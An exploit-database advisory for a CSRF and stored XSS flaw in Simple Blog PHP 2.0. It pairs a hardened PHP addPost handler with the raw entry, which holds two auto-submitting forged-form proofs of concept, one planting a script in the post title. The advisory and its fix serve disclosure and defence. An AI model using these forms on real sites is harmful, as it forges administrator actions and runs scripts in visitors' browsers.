vendor:
Simple Blog PHP
by:
Ashiyane Digital Security Team
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS)
352, 79
CWE
Product Name: Simple Blog PHP
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: 2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2016

Simple Blog PHP 2.0 – CSRF(Add Post) // Stored XSS

A Cross-Site Request Forgery (CSRF) vulnerability exists in Simple Blog PHP 2.0: the admin.php addPost action accepts a POST request without any anti-CSRF token, so an attacker can host a page containing a pre-filled form and, when a logged-in administrator visits it, a post with attacker-chosen content is added to the blog. The same request also carries a Stored Cross-Site Scripting (XSS) vulnerability: the post_title value is stored without sanitization, so the forged request can plant JavaScript in the post, which then executes in the browser of anyone who views it.

Mitigation:

The application should verify the request origin and validate all input data.
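As an added example (not Simple Blog PHP's own code), a hardened addPost handler in PHP that applies the mitigation above: a session-bound anti-CSRF token compared with hash_equals, an Origin/Referer host check, validation of the fields the PoC submits, and HTML output encoding so a stored title like the PoC's is displayed literally instead of executed. The token field name, length bounds and the in-memory post array are assumptions.

```php
<?php
// Illustrative hardening of an "act=addPost" handler; not Simple Blog PHP's code.
// Field names come from the advisory's PoC; token name, bounds and storage are assumed.
session_start();

// Synchronizer token: generated once per session and embedded in every form
// as <input type="hidden" name="csrf_token" value="...">.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A page on another origin cannot read the token, so a forged form fails here.
function csrf_token_valid(?string $submitted): bool {
    return is_string($submitted) && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence in depth: the Origin (or Referer) host must match our own host.
function origin_allowed(array $server): bool {
    $ownHost = explode(':', $server['HTTP_HOST'] ?? '')[0];
    $source  = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    return $ownHost !== '' && parse_url($source, PHP_URL_HOST) === $ownHost;
}

// Output encoding: stored title/text is rendered as text, never as markup,
// so "<script>alert('XssPoC')</script>" is shown literally and not executed.
function render_post(array $post): string {
    $h = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h2>' . $h($post['post_title']) . '</h2><div>' . $h($post['post_text']) . '</div>';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['act'] ?? '') === 'addPost') {
    if (!csrf_token_valid($_POST['csrf_token'] ?? null) || !origin_allowed($_SERVER)) {
        http_response_code(403);
        exit('Rejected: missing/invalid CSRF token or foreign origin.');
    }
    // Validate the remaining PoC fields before storing them (bounds are assumed).
    $title = trim((string)($_POST['post_title'] ?? ''));
    $limit = filter_var($_POST['post_limit'] ?? null, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 1, 'max_range' => 5000]]);
    $date  = DateTime::createFromFormat('Y-m-d H:i:s', (string)($_POST['publish_date'] ?? ''));
    if ($title === '' || strlen($title) > 200 || $limit === false || $date === false) {
        http_response_code(400);
        exit('Invalid post data.');
    }
    // The application's own save routine would go here; the post is rendered encoded.
    $post = ['post_title' => $title, 'post_text' => (string)($_POST['post_text'] ?? ''),
             'post_limit' => $limit, 'publish_date' => $date->format('Y-m-d H:i:s')];
    echo render_post($post);
}
```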

Exploit-DB raw data:

=====================================================
# Simple Blog PHP 2.0 - CSRF(Add Post) // Stored XSS
=====================================================
# Vendor Homepage: http://simpleblogphp.com/
# Date: 13 Oct 2016
# Demo Link : http://simpleblogphp.com/blog/admin.php
# Version : 2.0
# Platform : PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# CSRF PoC(Add Post):
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://localhost/blog/admin.php" method="POST">
      <input type="hidden" name="act" value="addPost" />
      <input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
      <input type="hidden" name="post_title" value="Hacked" />
      <input type="hidden" name="post_text" value="Hacked" />
      <input type="hidden" name="post_limit" value="550" />
	   <input type="submit" value="Submit request" />
    </form>
    <script>
		document.forms[0].submit();
    </script>
  </body>
</html>


# Stored XSS PoC:
<html>
  <!-- CSRF + XSS Stored PoC -->
  <body>
    <form action="http://localhost/blog/admin.php" method="POST">
      <input type="hidden" name="act" value="addPost" />
      <input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
      <input type="hidden" name="post_title" value="<script>alert('XssPoC')</script>" />
      <input type="hidden" name="post_text" value="Hacked" />
      <input type="hidden" name="post_limit" value="550" />
	   <input type="submit" value="Submit request" />
    </form>
    <script>
		document.forms[0].submit();
    </script>
  </body>
</html>
================================================================================
# Discovered By : Ehsan Hosseini
================================================================================